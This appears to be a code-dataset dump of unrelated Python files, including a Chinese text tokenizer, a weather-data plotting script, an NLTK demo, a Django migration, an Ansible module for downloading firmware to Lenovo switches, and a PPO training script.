39f43e90eba0874a7457724f83dae596172c3560
1,828
py
Python
cart_text_jieba.py
Artemis-ii/LDA
496e43f875ef35084cfb8539ee8bfe4e4fe68fb7
[ "Apache-2.0" ]
null
null
null
cart_text_jieba.py
Artemis-ii/LDA
496e43f875ef35084cfb8539ee8bfe4e4fe68fb7
[ "Apache-2.0" ]
null
null
null
cart_text_jieba.py
Artemis-ii/LDA
496e43f875ef35084cfb8539ee8bfe4e4fe68fb7
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Thu Nov 1 15:41:02 2018 @author: 月神少女 """ import jieba import jieba.analyse import jieba.posseg as pseg import codecs,sys from string import punctuation from text_parse import TEXT_parse if sys.getdefaultencoding() != 'utf-8': reload(sys) sys.setdefaultencoding('utf-8') class CART_text_jieba(): def __init__(self,txt_file,jieba_txt): self.txt_file = txt_file self.jieba_txt = jieba_txt def jieba(self): # 定义要删除的标点等字符 add_punc=',。、【 】 “”:;()《》‘’{}?!⑦()、%^>℃:.”“^-——=&#@¥' all_punc=punctuation+add_punc f=codecs.open(self.txt_file,'r',encoding="utf8") target = codecs.open(self.jieba_txt, 'w',encoding="utf8") print ('open files') line_num=1 line = f.readline() while line: print('---- processing ', line_num, ' article----------------') line_seg = " ".join(jieba.cut(line.replace("\n",""))) # 移除标点等需要删除的符号 testline=line_seg.split(' ') te2=[] for i in testline: te2.append(i) if i in all_punc: te2.remove(i) # 返回的te2是个list,转换为string后少了空格,因此需要再次分词 # 第二次在仅汉字的基础上再次进行分词 line_seg2 = " ".join(jieba.cut(''.join(te2))) target.writelines(line_seg2) line_num = line_num + 1 line = f.readline() f.close() target.close() ''' if __name__=="__main__": dire="datasource/cartdata" txt="data/cart_text.txt" cut_txt = "data/cart_text_cut.txt" stopword = "data/stopword.txt" text = TEXT_parse(directory=dire,txt_file=txt) text.parse() text_jieba = CART_text_jieba(txt_file=txt,jieba_txt=cut_txt) text_jieba.jieba() '''
27.283582
75
0.561269
299a75a96157e3264ce2c4e4173e6515f69546eb
1,927
py
Python
setup.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
setup.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
setup.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
#!/usr/bin/env python """ ZTC setup file Copyright (c) 2009-2012 Vladimir Rusinov <[email protected]> Copyright (c) 2012 Murano Software [http://www.muranosoft.com] """ import glob import sys if sys.version_info > (3, 3): from packaging.core import setup print("Using packaging") else: try: from distutils2.core import setup print("Using distutils2") except ImportError: from distutils.core import setup setup( name='ztc', version='12.04', description='Zabbix Template Collection', author='Vladimir Rusinov', author_email='[email protected]', url='https://bitbucket.org/rvs/ztc/wiki/Home', package_dir={'': 'src'}, packages=[ 'ztc', 'ztc.lib', 'ztc.system', 'ztc.system.vfs', 'ztc.apache', 'ztc.mysql', 'ztc.nginx', 'ztc.vm', 'ztc.pgsql', 'ztc.net', 'ztc.net.icmp', 'ztc.net.http', 'ztc.hw', 'ztc.java', 'ztc.java.tomcat', 'ztc.php', 'ztc.mongo', 'ztc.ldap'], scripts=glob.glob('src/*.py'), data_files=[ ('/etc/zabbix-agent.d/', glob.glob('./conf/zabbix-agent.d/*.conf') + \ glob.glob('./conf/zabbix-agent.d/*.ini')), ('/etc/ztc', glob.glob('./conf/etc/*.conf')), ('/opt/ztc/templates', glob.glob('templates/*.xml')), ('/opt/ztc/doc/', ('README', 'REQUIREMENTS')), ('/opt/ztc/lib/', glob.glob('lib/*.jar')), ('/opt/ztc/contrib/2gis/bin/', glob.glob('contrib/2gis/bin/*')), ('/opt/ztc/contrib/2gis/conf/zabbix-agent.d/', glob.glob('contrib/2gis/conf/zabbix-agent.d/*')), ('/opt/ztc/contrib/2gis/templates/', glob.glob('contrib/2gis/templates/*')), ('/opt/ztc/contrib/2gis/', glob.glob('contrib/2gis/README')), ], )
31.590164
76
0.542813
29ad9532f3d978caebfd889dd1dcd0b381e68ff3
5,720
py
Python
analysis/Plot_by_time.py
MeteorologieHautnah/MeteorologieHautnah
1607c25b85753f31faccfd279abd503b83c1f4ea
[ "MIT" ]
1
2022-02-17T08:24:13.000Z
2022-02-17T08:24:13.000Z
analysis/Plot_by_time.py
MeteorologieHautnah/MeteorologieHautnah
1607c25b85753f31faccfd279abd503b83c1f4ea
[ "MIT" ]
null
null
null
analysis/Plot_by_time.py
MeteorologieHautnah/MeteorologieHautnah
1607c25b85753f31faccfd279abd503b83c1f4ea
[ "MIT" ]
null
null
null
#!/usr/bin/env python # coding: utf-8 # In[5]: index from wetterdienst import Wetterdienst from wetterdienst.provider.dwd.observation import DwdObservationRequest, DwdObservationDataset, DwdObservationPeriod, DwdObservationResolution from datetime import datetime, timedelta import numpy as np import pandas as pd import matplotlib.pyplot as plt import smopy def station_temp(name, start_date, end_date): request = DwdObservationRequest(parameter=[DwdObservationDataset.TEMPERATURE_AIR], resolution=DwdObservationResolution.MINUTE_10, start_date=start_date, end_date=end_date, ).filter_by_name(name=name) df_res = request.values.all().df.dropna() df_Temp=df_res[df_res.parameter=="temperature_air_mean_200"].drop(['dataset', 'parameter', 'quality'], axis=1) df_Temp.rename(columns={'value':'T'}, inplace=True) df_dew=df_res[df_res.parameter=="temperature_dew_point_mean_200"].drop(['station_id', 'dataset', 'parameter', 'quality'], axis=1) df_dew.rename(columns={'value':'Td'}, inplace=True) df_Temp.set_index(pd.DatetimeIndex(df_Temp['date']), inplace=True) df_dew.set_index(pd.DatetimeIndex(df_Temp['date']), inplace=True) df_out=df_Temp.merge(df_dew, how='left', left_index=True, right_index=True) df_out["time"]=pd.to_datetime(df_Temp.date, format="%Y-%m-%d %H:%M:%S%z").dt.tz_localize(None) #df_out["SEC"]=pd.to_timedelta(df_Temp.date).dt.total_seconds() df_out.set_index(df_out["time"], inplace=True) #df_out.drop(["date"], axis=1) #df_out.set_index("time", inplace=True) df_out=df_out.drop(["date_x", "date_y"], axis=1) #df_out.T=df_out.T-273.15 #df_out.Td=df_out.Td-273.15 return df_out # In[17]: Read file station="Leipzig-Holzhausen" #station="Leipzig/Halle" fn = "./processed/2022-05-24_meteotracker.csv" ds = pd.read_csv(fn) #ds=ds[100:-100] ds.time=pd.to_datetime(ds.time, format="%Y-%m-%dT%H:%M:%S.%fZ") ds["hour"]=ds["time"].dt.strftime("%H").astype(int) ds.set_index(pd.DatetimeIndex(ds["time"]), inplace=True) print("Überblick zum Datensatz:") print() print(ds.nunique()) ds_raw=ds 
ds=ds[ds.speed>10] # eliminiert Messungen bei Stillstand print() print() print("gefiltert nach Geschwindigkeit: ") print() print( ds.nunique()) # In[13]: plot raw map map = smopy.Map((51.294, 12.31, 51.393, 12.42), z=12) map.show_ipython() #%% start_date=datetime.strftime(min(ds.time), format="%Y-%m-%d") end_date=datetime.strftime(max(ds.time)+np.timedelta64(1, 'D'), format="%Y-%m-%d") DWD=station_temp(station, start_date, end_date) # In[19]: add Dataset ax = map.show_mpl(figsize=(15, 12)) x, y = map.to_pixels(ds.lat, ds.lon) ax.set_title("Gemessene Temperaturen am "+start_date+ " in $^\circ C$", fontsize=30) scatter=ax.scatter(x,y, c=ds.air_temperature, cmap="plasma") cbar=plt.colorbar(scatter, ax=ax) # In[19]: Zeitreihe:wann wurde gemessen? ax = map.show_mpl(figsize=(10, 8)) x, y = map.to_pixels(ds.lat, ds.lon) ax.set_title("Messzeiten am "+start_date+" in h", fontsize=20) scatter=ax.scatter(x,y, c=ds.hour, cmap="rainbow") plt.colorbar(scatter, ax=ax) #%% #ds["SOD"]=timedelta.seconds(ds.time-datetime.strptime(start_date, "%Y-%m-%d")) #df_compared=ds.append(Holzhausen, sort=False) df_compared=ds.merge(DWD, how="outer", sort=True, left_index=True, right_index=True) #df_compared["SOD"]=pd.to_timedelta(df_compared.time).dt.total_seconds() df_compared=df_compared.drop(["time_x", "time_y"], axis=1) #df_compared.set_index("SEC", inplace=True) #df_compared.set_index(pd.DatetimeIndex(df_compared['time']), inplace=True) #df_compared=df_compared.drop("date", axis=1) #for col in ["T", "Td"]: # df_compared[col]=pd.to_numeric(df_compared[col], errors='coerce') df_compared["T"]=df_compared["T"]-273.15 df_compared["Td"]=df_compared["Td"]-273.15 df_compared["T"]=df_compared["T"].interpolate(method="time", inplace=False, axis=0) df_compared["Td"]=df_compared["Td"].interpolate(method="time", inplace=False, axis=0) df_compared["T_diff"]=df_compared["air_temperature"]-df_compared["T"] #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared["air_temperature"], label="T Track") 
ax.set_xlabel("Zeit") ax.set_ylabel("Temperatur in $^\circ C$") fig.suptitle("Zeitreihe Messfahrten"+ " am "+start_date) #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared["T"], label="T "+station) fig.suptitle("T "+station+ " am "+start_date) ax.set_xlabel("Zeit") ax.set_ylabel("Temperatur in $^\circ C$") #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared["T"], label="T "+station) ax.plot(df_compared["air_temperature"], label="T Track") fig.suptitle("Zeitreihe Messfahrten und Tagesgang "+station+ " am "+start_date) ax.set_xlabel("Zeit") ax.set_ylabel("Temperatur in $^\circ C$") ax.legend() #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared["T"], label="T "+station) ax.plot(df_compared["air_temperature"], label="T Track") fig.suptitle("Zeitreihe Messfahrten und Tagesgang "+station+ " am "+start_date) ax.set_xlabel("Zeit") ax.set_ylabel("Temperatur in $^\circ C$") ax.grid() ax.legend() ax.set_xlim([min(ds.time),max(ds.time) ]) #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared.T_diff) fig.suptitle("Temperaturdifferenz Messfahrt - "+station) # In[19]: add differential ax = map.show_mpl(figsize=(10, 8)) x, y = map.to_pixels(df_compared.lat, df_compared.lon) ax.set_title("Gemessene Temperaturdifferenzen ggü. "+station+ " am "+start_date, fontsize=20) scatter=ax.scatter(x,y, c=df_compared.T_diff, cmap="seismic", vmin=-5, vmax=5) plt.colorbar(scatter, ax=ax)
27.368421
142
0.697378
8a25f062ae089a9c6e618210f3ca9e6e14cc1ac8
2,318
py
Python
textmining/com/aaron/text_token.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
null
null
null
textmining/com/aaron/text_token.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
2
2021-03-25T22:00:07.000Z
2022-01-20T15:51:48.000Z
textmining/com/aaron/text_token.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
null
null
null
import pandas as pd import numpy as np import nltk import os import nltk.corpus from nltk.tokenize import word_tokenize from nltk.tokenize import sent_tokenize from nltk.probability import FreqDist import matplotlib.pyplot as plt from nltk.corpus import stopwords from nltk.stem import PorterStemmer from nltk.tokenize import sent_tokenize, word_tokenize from nltk.stem.wordnet import WordNetLemmatizer # sample text for performing tokenization def print_text_tokenize(text): # Passing the string text into word tokenize for breaking the sentences token = word_tokenize(text) print(token) return token def print_text_sentence_tokenization(text): sentence_tokenized_text = sent_tokenize(text) print(sentence_tokenized_text) fdist = FreqDist(sentence_tokenized_text) print(fdist) print(fdist.most_common(2)) # fdist.plot(30, cumulative=False) # plt.show() if __name__ == "__main__": text = "In Brazil they drive on the right-hand side of the road. Brazil has a large coastline on the eastern \ side of South America" text = "Download individual packages from http://nltk.org/nltk_data/ (see the “download” links). Unzip them \ to the appropriate subfolder. For example" token = print_text_tokenize(text) tokenized_sent = set(stopwords.words("english")) print(tokenized_sent) filtered_sent = [] for w in tokenized_sent: if w not in tokenized_sent: filtered_sent.append(w) print("Tokenized Sentence:", tokenized_sent) print("Filterd Sentence:", filtered_sent) ps = PorterStemmer() stemmed_words = [] for w in filtered_sent: stemmed_words.append(ps.stem(w)) print("Filtered Sentence:", filtered_sent) print("Stemmed Sentence:", stemmed_words) lem = WordNetLemmatizer() stem = PorterStemmer() word = "flying" print("Lemmatized Word:", lem.lemmatize(word, "v")) print("Stemmed Word:", stem.stem(word)) text = """Hello Mr. Smith, how are you doing today? The weather is great, and city is awesome. The sky is pinkish-blue. 
You shouldn't eat cardboard""" print_text_sentence_tokenization(text) sent = "Albert Einstein was born in Ulm, Germany in 1879." tokens = nltk.word_tokenize(sent) print(tokens) print(nltk.pos_tag(tokens))
31.324324
114
0.725626
8abb7933cc4ebb9742b25dffa851376252ea1ffd
840
py
Python
gemtown/modelphotos/migrations/0005_auto_20190424_0316.py
doramong0926/gemtown
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
[ "MIT" ]
null
null
null
gemtown/modelphotos/migrations/0005_auto_20190424_0316.py
doramong0926/gemtown
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
[ "MIT" ]
5
2020-09-04T20:13:39.000Z
2022-02-17T22:03:33.000Z
gemtown/modelphotos/migrations/0005_auto_20190424_0316.py
doramong0926/gemtown
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
[ "MIT" ]
null
null
null
# Generated by Django 2.0.13 on 2019-04-23 18:16 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('modelphotos', '0004_auto_20190420_1737'), ] operations = [ migrations.AlterField( model_name='modelphoto', name='confirm_status', field=models.CharField(choices=[('approving', 'APPROVING'), ('ready', 'READY'), ('pendding', 'PENDDING'), ('rejected', 'REJECTED'), ('approved', 'APPROVED'), ('completed', 'COMPLETED')], default='ready', max_length=20), ), migrations.AlterField( model_name='modelphoto', name='photo_type', field=models.CharField(blank=True, choices=[('etc', 'ETC'), ('full', 'FULL'), ('cover', 'COVER'), ('half', 'HALF')], max_length=256), ), ]
35
231
0.590476
0a8f403bda330cd8e652a58480dad635564ba2ba
1,371
py
Python
packages/OpenCV/nodes/OpenCV___TopHat0/widgets/OpenCV___TopHat0___main_widget.py
Shirazbello/Pyscriptining
0f2c80a9bb10477d65966faeccc7783f20385c1b
[ "MIT" ]
null
null
null
packages/OpenCV/nodes/OpenCV___TopHat0/widgets/OpenCV___TopHat0___main_widget.py
Shirazbello/Pyscriptining
0f2c80a9bb10477d65966faeccc7783f20385c1b
[ "MIT" ]
null
null
null
packages/OpenCV/nodes/OpenCV___TopHat0/widgets/OpenCV___TopHat0___main_widget.py
Shirazbello/Pyscriptining
0f2c80a9bb10477d65966faeccc7783f20385c1b
[ "MIT" ]
null
null
null
# from PySide2.QtWidgets import ... # from PySide2.QtCore import ... # from PySide2.QtGui import ... from PySide2.QtGui import QImage, QPixmap from PySide2.QtWidgets import QLabel import cv2 class TopHat_NodeInstance_MainWidget(QLabel): def __init__(self, parent_node_instance): super(TopHat_NodeInstance_MainWidget, self).__init__() # leave these lines ------------------------------ self.parent_node_instance = parent_node_instance # ------------------------------------------------ self.resize(200, 200) def show_image(self, cv_image): self.resize(200, 200) rgb_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB) h, w, ch = rgb_image.shape bytes_per_line = ch * w qt_image = QImage(rgb_image.data, w, h, bytes_per_line, QImage.Format_RGB888) img_w = qt_image.width() img_h = qt_image.height() proportion = img_w / img_h self.resize(self.width() * proportion, self.height()) qt_image = qt_image.scaled(self.width(), self.height()) self.setPixmap(QPixmap(qt_image)) self.parent_node_instance.update_shape() def get_data(self): return self.text() def set_data(self, data): self.setText(data) # optional - important for threading - stop everything here def removing(self): pass
30.466667
85
0.625091
0ab3d809a5389df90021eae3ed8f13b056c852ec
8,972
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/network/cnos/cnos_image.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/network/cnos/cnos_image.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/network/cnos/cnos_image.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import (absolute_import, division, print_function) __metaclass__ = type # # Copyright (C) 2017 Lenovo, Inc. # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # # Module to download new image to Lenovo Switches # Lenovo Networking # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: cnos_image author: "Anil Kumar Muraleedharan (@amuraleedhar)" short_description: Perform firmware upgrade/download from a remote server on devices running Lenovo CNOS description: - This module allows you to work with switch firmware images. It provides a way to download a firmware image to a network device from a remote server using FTP, SFTP, TFTP, or SCP. The first step is to create a directory from where the remote server can be reached. The next step is to provide the full file path of the image's location. Authentication details required by the remote server must be provided as well. By default, this method makes the newly downloaded firmware image the active image, which will be used by the switch during the next restart. This module uses SSH to manage network device configuration. The results of the operation will be placed in a directory named 'results' that must be created by the user in their local directory to where the playbook is run. 
extends_documentation_fragment: - community.general.cnos options: protocol: description: - This refers to the protocol used by the network device to interact with the remote server from where to download the firmware image. The choices are FTP, SFTP, TFTP, or SCP. Any other protocols will result in error. If this parameter is not specified there is no default value to be used. required: true choices: [SFTP, SCP, FTP, TFTP] serverip: description: - This specifies the IP Address of the remote server from where the software image will be downloaded. required: true imgpath: description: - This specifies the full file path of the image located on the remote server. In case the relative path is used as the variable value, the root folder for the user of the server needs to be specified. required: true imgtype: description: - This specifies the firmware image type to be downloaded required: true choices: [all, boot, os, onie] serverusername: description: - Specify the username for the server relating to the protocol used required: true serverpassword: description: - Specify the password for the server relating to the protocol used ''' EXAMPLES = ''' Tasks : The following are examples of using the module cnos_image. These are written in the main.yml file of the tasks directory. 
--- - name: Test Image transfer cnos_image: deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}" outputfile: "./results/test_image_{{ inventory_hostname }}_output.txt" protocol: "sftp" serverip: "10.241.106.118" imgpath: "/root/cnos_images/G8272-10.1.0.112.img" imgtype: "os" serverusername: "root" serverpassword: "root123" - name: Test Image tftp cnos_image: deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}" outputfile: "./results/test_image_{{ inventory_hostname }}_output.txt" protocol: "tftp" serverip: "10.241.106.118" imgpath: "/anil/G8272-10.2.0.34.img" imgtype: "os" serverusername: "root" serverpassword: "root123" ''' RETURN = ''' msg: description: Success or failure message returned: always type: str sample: "Image file transferred to device" ''' import sys import time import socket import array import json import time import re import os try: from ansible_collections.community.general.plugins.module_utils.network.cnos import cnos HAS_LIB = True except Exception: HAS_LIB = False from ansible.module_utils.basic import AnsibleModule from collections import defaultdict def doImageDownload(module, prompt, answer): protocol = module.params['protocol'].lower() server = module.params['serverip'] imgPath = module.params['imgpath'] imgType = module.params['imgtype'] username = module.params['serverusername'] password = module.params['serverpassword'] retVal = '' command = "copy " + protocol + " " + protocol + "://" + username + "@" command = command + server + "/" + imgPath + " system-image " command = command + imgType + " vrf management" cmd = [] if(protocol == "scp"): prompt = ['timeout', 'Confirm download operation', 'Password', 'Do you want to change that to the standby image'] answer = ['240', 'y', password, 'y'] scp_cmd = [{'command': command, 'prompt': prompt, 'answer': answer, 'check_all': True}] cmd.extend(scp_cmd) retVal = retVal + str(cnos.run_cnos_commands(module, cmd)) elif(protocol == "sftp"): prompt = ['Confirm download 
operation', 'Password', 'Do you want to change that to the standby image'] answer = ['y', password, 'y'] sftp_cmd = [{'command': command, 'prompt': prompt, 'answer': answer, 'check_all': True}] cmd.extend(sftp_cmd) retVal = retVal + str(cnos.run_cnos_commands(module, cmd)) elif(protocol == "ftp"): prompt = ['Confirm download operation', 'Password', 'Do you want to change that to the standby image'] answer = ['y', password, 'y'] ftp_cmd = [{'command': command, 'prompt': prompt, 'answer': answer, 'check_all': True}] cmd.extend(ftp_cmd) retVal = retVal + str(cnos.run_cnos_commands(module, cmd)) elif(protocol == "tftp"): command = "copy " + protocol + " " + protocol + "://" + server command = command + "/" + imgPath + " system-image " + imgType command = command + " vrf management" prompt = ['Confirm download operation', 'Do you want to change that to the standby image'] answer = ['y', 'y'] tftp_cmd = [{'command': command, 'prompt': prompt, 'answer': answer, 'check_all': True}] cmd.extend(tftp_cmd) retVal = retVal + str(cnos.run_cnos_commands(module, cmd)) else: return "Error-110" return retVal # EOM def main(): module = AnsibleModule( argument_spec=dict( outputfile=dict(required=True), host=dict(required=False), username=dict(required=False), password=dict(required=False, no_log=True), enablePassword=dict(required=False, no_log=True), deviceType=dict(required=True), protocol=dict(required=True), serverip=dict(required=True), imgpath=dict(required=True), imgtype=dict(required=True), serverusername=dict(required=False), serverpassword=dict(required=False, no_log=True),), supports_check_mode=False) outputfile = module.params['outputfile'] protocol = module.params['protocol'].lower() output = '' # Invoke method for image transfer from server if(protocol == "tftp" or protocol == "ftp" or protocol == "sftp" or protocol == "scp"): transfer_status = doImageDownload(module, None, None) else: transfer_status = "Invalid Protocol option" output = output + "\n Image Transfer 
status \n" + transfer_status # Save it into the file path = outputfile.rsplit('/', 1) if not os.path.exists(path[0]): os.makedirs(path[0]) file = open(outputfile, "a") file.write(output) file.close() # Logic to check when changes occur or not errorMsg = cnos.checkOutputForError(output) if(errorMsg is None): module.exit_json(changed=True, msg="Image file transferred to device") else: module.fail_json(msg=errorMsg) if __name__ == '__main__': main()
37.07438
92
0.646121
0ae802e4917c2a13270b04fb4de96f98679c021e
10,268
py
Python
PPO-PyTorch/train.py
xixiha5230/RL
cc957a4231263074b8cf7fad6ba276f4b3899670
[ "MIT" ]
null
null
null
PPO-PyTorch/train.py
xixiha5230/RL
cc957a4231263074b8cf7fad6ba276f4b3899670
[ "MIT" ]
null
null
null
PPO-PyTorch/train.py
xixiha5230/RL
cc957a4231263074b8cf7fad6ba276f4b3899670
[ "MIT" ]
null
null
null
import os
import glob
import time
from datetime import datetime

import torch
import numpy as np

import gym

from PPO import PPO


################################### Training ###################################
def train():
    """Train a PPO agent on a single Gym environment (Walker2d-v2 by default).

    All hyperparameters are hard-coded at the top of this function. Per-run
    CSV logs are written under ``PPO-PyTorch/PPO_logs/<env>/`` (a new file per
    run) and model checkpoints under ``PPO-PyTorch/PPO_preTrained/<env>/``
    (overwritten unless ``run_num_pretrained`` is changed). Runs until
    ``max_training_timesteps`` environment steps have been taken.
    """
    print("============================================================================================")

    ####### initialize environment hyperparameters ######
    env_name = "Walker2d-v2"

    has_continuous_action_space = True  # continuous action space; else discrete

    max_ep_len = 1000                    # max timesteps in one episode
    max_training_timesteps = int(3e6)    # break training loop if timeteps > max_training_timesteps

    print_freq = max_ep_len * 10         # print avg reward in the interval (in num timesteps)
    log_freq = max_ep_len * 2            # log avg reward in the interval (in num timesteps)
    save_model_freq = int(1e5)           # save model frequency (in num timesteps)

    action_std = 0.6                     # starting std for action distribution (Multivariate Normal)
    action_std_decay_rate = 0.05         # linearly decay action_std (action_std = action_std - action_std_decay_rate)
    min_action_std = 0.1                 # minimum action_std (stop decay after action_std <= min_action_std)
    action_std_decay_freq = int(2.5e5)   # action_std decay frequency (in num timesteps)
    #####################################################

    ## Note : print/log frequencies should be > than max_ep_len
    ## (otherwise the running-average divisors below could still be zero
    ##  when the first log/print interval fires)

    ################ PPO hyperparameters ################
    update_timestep = max_ep_len * 4     # update policy every n timesteps
    K_epochs = 80                        # update policy for K epochs in one PPO update

    eps_clip = 0.2                       # clip parameter for PPO
    gamma = 0.99                         # discount factor

    lr_actor = 0.0003                    # learning rate for actor network
    lr_critic = 0.001                    # learning rate for critic network

    random_seed = 0                      # set random seed if required (0 = no random seed)
    #####################################################

    print("training environment name : " + env_name)

    env = gym.make(env_name)

    # state space dimension
    state_dim = env.observation_space.shape[0]

    # action space dimension
    if has_continuous_action_space:
        action_dim = env.action_space.shape[0]
    else:
        action_dim = env.action_space.n

    ###################### logging ######################

    #### log files for multiple runs are NOT overwritten
    log_dir = "PPO-PyTorch/PPO_logs"
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)

    log_dir = log_dir + '/' + env_name + '/'
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)

    #### get number of log files in log directory
    # run_num = number of existing files, so each run gets a fresh CSV name
    run_num = 0
    current_num_files = next(os.walk(log_dir))[2]
    run_num = len(current_num_files)

    #### create new log file for each run
    log_f_name = log_dir + '/PPO_' + env_name + "_log_" + str(run_num) + ".csv"

    print("current logging run number for " + env_name + " : ", run_num)
    print("logging at : " + log_f_name)
    #####################################################

    ################### checkpointing ###################
    run_num_pretrained = 0      #### change this to prevent overwriting weights in same env_name folder

    directory = "PPO-PyTorch/PPO_preTrained"
    if not os.path.exists(directory):
        os.makedirs(directory)

    directory = directory + '/' + env_name + '/'
    if not os.path.exists(directory):
        os.makedirs(directory)

    checkpoint_path = directory + "PPO_{}_{}_{}.pth".format(env_name, random_seed, run_num_pretrained)
    print("save checkpoint path : " + checkpoint_path)
    #####################################################

    ############# print all hyperparameters #############
    print("--------------------------------------------------------------------------------------------")
    print("max training timesteps : ", max_training_timesteps)
    print("max timesteps per episode : ", max_ep_len)
    print("model saving frequency : " + str(save_model_freq) + " timesteps")
    print("log frequency : " + str(log_freq) + " timesteps")
    print("printing average reward over episodes in last : " + str(print_freq) + " timesteps")
    print("--------------------------------------------------------------------------------------------")
    print("state space dimension : ", state_dim)
    print("action space dimension : ", action_dim)
    print("--------------------------------------------------------------------------------------------")
    if has_continuous_action_space:
        print("Initializing a continuous action space policy")
        print("--------------------------------------------------------------------------------------------")
        print("starting std of action distribution : ", action_std)
        print("decay rate of std of action distribution : ", action_std_decay_rate)
        print("minimum std of action distribution : ", min_action_std)
        print("decay frequency of std of action distribution : " + str(action_std_decay_freq) + " timesteps")
    else:
        print("Initializing a discrete action space policy")
    print("--------------------------------------------------------------------------------------------")
    print("PPO update frequency : " + str(update_timestep) + " timesteps")
    print("PPO K epochs : ", K_epochs)
    print("PPO epsilon clip : ", eps_clip)
    print("discount factor (gamma) : ", gamma)
    print("--------------------------------------------------------------------------------------------")
    print("optimizer learning rate actor : ", lr_actor)
    print("optimizer learning rate critic : ", lr_critic)
    if random_seed:
        print("--------------------------------------------------------------------------------------------")
        print("setting random seed to ", random_seed)
        torch.manual_seed(random_seed)
        # NOTE(review): env.seed() is the pre-0.26 Gym API — confirm the
        # installed gym version still supports it.
        env.seed(random_seed)
        np.random.seed(random_seed)
    #####################################################

    print("============================================================================================")

    ################# training procedure ################

    # initialize a PPO agent
    ppo_agent = PPO(state_dim, action_dim, lr_actor, lr_critic, gamma, K_epochs, eps_clip, has_continuous_action_space, action_std)

    # track total training time
    start_time = datetime.now().replace(microsecond=0)
    print("Started training at (GMT) : ", start_time)

    print("============================================================================================")

    # logging file
    log_f = open(log_f_name,"w+")
    log_f.write('episode,timestep,reward\n')

    # printing and logging variables
    print_running_reward = 0
    print_running_episodes = 0

    log_running_reward = 0
    log_running_episodes = 0

    time_step = 0
    i_episode = 0

    # training loop
    while time_step <= max_training_timesteps:

        state = env.reset()
        current_ep_reward = 0

        for t in range(1, max_ep_len+1):

            # select action with policy
            action = ppo_agent.select_action(state)
            state, reward, done, _ = env.step(action)

            # saving reward and is_terminals
            # (select_action stores state/action/logprob in the buffer;
            #  reward and terminal flag are appended here — presumably the
            #  PPO class relies on these lists staying in lockstep)
            ppo_agent.buffer.rewards.append(reward)
            ppo_agent.buffer.is_terminals.append(done)

            time_step +=1
            current_ep_reward += reward

            # update PPO agent
            if time_step % update_timestep == 0:
                ppo_agent.update()

            # if continuous action space; then decay action std of ouput action distribution
            if has_continuous_action_space and time_step % action_std_decay_freq == 0:
                ppo_agent.decay_action_std(action_std_decay_rate, min_action_std)

            # log in logging file
            if time_step % log_freq == 0:

                # log average reward till last episode
                # (safe divide: log_freq > max_ep_len guarantees at least one
                #  completed episode per interval)
                log_avg_reward = log_running_reward / log_running_episodes
                log_avg_reward = round(log_avg_reward, 4)

                log_f.write('{},{},{}\n'.format(i_episode, time_step, log_avg_reward))
                log_f.flush()

                log_running_reward = 0
                log_running_episodes = 0

            # printing average reward
            if time_step % print_freq == 0:

                # print average reward till last episode
                print_avg_reward = print_running_reward / print_running_episodes
                print_avg_reward = round(print_avg_reward, 2)

                print("Episode : {} \t\t Timestep : {} \t\t Average Reward : {}".format(i_episode, time_step, print_avg_reward))

                print_running_reward = 0
                print_running_episodes = 0

            # save model weights
            if time_step % save_model_freq == 0:
                print("--------------------------------------------------------------------------------------------")
                print("saving model at : " + checkpoint_path)
                ppo_agent.save(checkpoint_path)
                print("model saved")
                print("Elapsed Time : ", datetime.now().replace(microsecond=0) - start_time)
                print("--------------------------------------------------------------------------------------------")

            # break; if the episode is over
            if done:
                break

        # per-episode running sums, consumed by the print/log branches above
        print_running_reward += current_ep_reward
        print_running_episodes += 1

        log_running_reward += current_ep_reward
        log_running_episodes += 1

        i_episode += 1

    log_f.close()
    env.close()

    # print total training time
    print("============================================================================================")
    end_time = datetime.now().replace(microsecond=0)
    print("Started training at (GMT) : ", start_time)
    print("Finished training at (GMT) : ", end_time)
    print("Total training time : ", end_time - start_time)
